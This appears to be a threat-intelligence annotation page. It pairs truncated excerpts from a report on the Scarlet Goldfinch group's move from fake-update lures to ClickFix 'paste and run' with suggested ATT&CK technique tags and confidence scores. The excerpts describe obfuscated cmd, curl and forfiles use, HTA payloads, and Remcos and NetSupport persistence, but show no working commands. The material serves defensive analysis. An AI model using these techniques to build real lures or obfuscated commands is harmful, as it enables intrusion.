“payload. the following images show command lines from before and after the forfiles change. forfiles detection from mid - january if exist detection from late january scarlet goldfinch continued checking for the existence of notepad until mid - february, and then dropped that rus…”
Which technique(s) should be tagged here? Pick zero or more — leaving blank just records that the original was wrong.
No matches for .
Loading techniques…
T1059.001PowerShell
96%
“cmd or via powershell ’ sinvoke - cimmethod example 1, from early february example 2, from mid - march once remcos is running, scarlet goldfinch often uses it to download, execute, and establish persistence for netsupport manager, as described in epoch 5 in the threat detection r…”
Which technique(s) should be tagged here? Pick zero or more — leaving blank just records that the original was wrong.
No matches for .
Loading techniques…
T1204.002Malicious File
85%
“##3 that followed socgholish ’ s fake update footsteps, scarlet goldfinch is tracked by other researchers under several different names, including smartapesg ( due to early observations of c2 infrastructure hosted on smartape asn ) and zphp ( due to the use of php files to host c…”
Which technique(s) should be tagged here? Pick zero or more — leaving blank just records that the original was wrong.
No matches for .
Loading techniques…
T1204.002Malicious File
60%
“scarlet goldfinch ’ s year in clickfix red canary has just released the 2026 threat detection report, unveiling the top 10 most prevalent threats we detected over last year. six out of those 10 threats were directly linked to the hottest trend in initial access, “ paste and run, …”
Which technique(s) should be tagged here? Pick zero or more — leaving blank just records that the original was wrong.
No matches for .
Loading techniques…
T1219Remote Access Tools
57%
“cmd or via powershell ’ sinvoke - cimmethod example 1, from early february example 2, from mid - march once remcos is running, scarlet goldfinch often uses it to download, execute, and establish persistence for netsupport manager, as described in epoch 5 in the threat detection r…”
Which technique(s) should be tagged here? Pick zero or more — leaving blank just records that the original was wrong.
No matches for .
Loading techniques…
T1027.010Command Obfuscation
42%
“these variables were just used to specify the location for the download ( and enable a quick deletion of the hta payload after execution ). curl detection from mid - february additional obfuscation appeared in short order, first by adding more command obfuscation via ^ as an esca…”
Which technique(s) should be tagged here? Pick zero or more — leaving blank just records that the original was wrong.
No matches for .
Loading techniques…
T1202Indirect Command Execution
35%
“payload. the following images show command lines from before and after the forfiles change. forfiles detection from mid - january if exist detection from late january scarlet goldfinch continued checking for the existence of notepad until mid - february, and then dropped that rus…”
Which technique(s) should be tagged here? Pick zero or more — leaving blank just records that the original was wrong.
No matches for .
Loading techniques…
Summary
How Scarlet Goldfinch ditched its fake updates lure and adopted ClickFix, or "paste and run," in 2025 and beyond.